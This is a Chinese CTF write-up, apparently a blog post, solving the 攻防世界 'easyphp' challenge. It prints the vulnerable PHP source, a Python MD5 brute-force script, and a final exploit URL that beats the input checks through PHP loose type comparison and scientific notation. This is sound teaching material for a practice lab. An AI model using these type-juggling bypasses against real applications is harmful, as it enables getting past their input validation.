ctf 攻防世界 easyphp 江苏工匠杯

最新推荐文章于 2025-10-09 21:27:00 发布

原创最新推荐文章于 2025-10-09 21:27:00 发布 · 664 阅读

15 ·

CC 4.0 BY-SA版权

文章标签：

#算法 #安全 #网络安全 #php

弱类型比较得问题

<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;

$a = $_GET['a'];
$b = $_GET['b'];

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

if($key1 && $key2){
    include "Hgfks.php";
    echo "You're right"."\n";
    echo $flag;
}

?>

首先看到最后一行，需要key1=1 and key2=1，才能够输出flag，所以我们就冲着这个目标去。

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

第一关，判断 $a 不为空，$ a的整数值大于600000，而且要求 $a 的长度小于等于 3 ，所以考虑用科学计数法来绕过长度的限制，令$ a=1e9成功绕过。
第二关，要求 $b 不为空，并且要求$ bmd5加密后的值的后六位等于8b184b，所以我们写个python脚本，跑一个数值出来。


import hashlib
 
def md5(str):
    m = hashlib.md5()
    m.update(str.encode("utf-8"))
    return m.hexdigest()




for i in range(0,60000):
    m = str(i)        
    k = md5(m)[-6:]
    print(k)
    if k =='8b184b':
        print(i)
        break

跑得的数值为53724，所以我们令$b=53724成功的绕过第二关。

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

第三关，传入一个$c进行json_decode，判断是不是数组，要求数组中m的值不能是数字，又要求m的值大于2022，php的弱类型比较，我们就用2023c进行绕过。
第四关，要求数组中n的值是一个数组，并且数量为2，并且要求数组n的第一个数，也是个数组，所以我们，就用c={“m”:“2023c”,“n”:[[],1]}来进行绕过。
第五关，
$d = array_search(“DGGJ”, $c[“n”]);
$d === false?die(“no…”):NULL;

这个代码，去n里面寻找“DGGJ”，如果找到，就返回它所在的键值，如果找不到，就是flase，寻找的时候，是松散比较，也就是==，已知，字母开头的字符串==0，所以 “DGGJ” ==0 ，所以，n里面要有0
一 foreach的语法介绍
PHP 4以上的版本包括了 foreach 结构，这只是一种遍历数组简便方法。foreach 仅能用于数组，当试图将其用于其它数据类型或者一个未初始化的变量时会产生错误。有两种语法，第二种是第一种的有用的扩展。
foreach(array_expression as $value) statement
foreach(array_expression as $key => $value) statement
第一种格式遍历给定的 array_expression 数组。每次循环中，当前单元的值被赋给 $value 并且数组内部的指针向前移一步（因此下一次循环中将会得到下一个单元）。
第二种格式做同样的事，只是除了当前单元的值以外，键值也会在每次循环中被赋给变量 $key。看下面代码：

$arr = array("1"=>"111","2"=>"222","3"=>"333");
foreach($arr as $key=>$value)
{
 echo $key."=>".$value." ";
}
结果如下：
1=>111
2=>222
3=>333

键值这里可以理解为数组下标，数组元素a[2]的下标就是2.

 所以最终的payload=http://61.147.171.105:65244/?a=1e9&b=53724&c={"m":"2023c","n":[[],0]}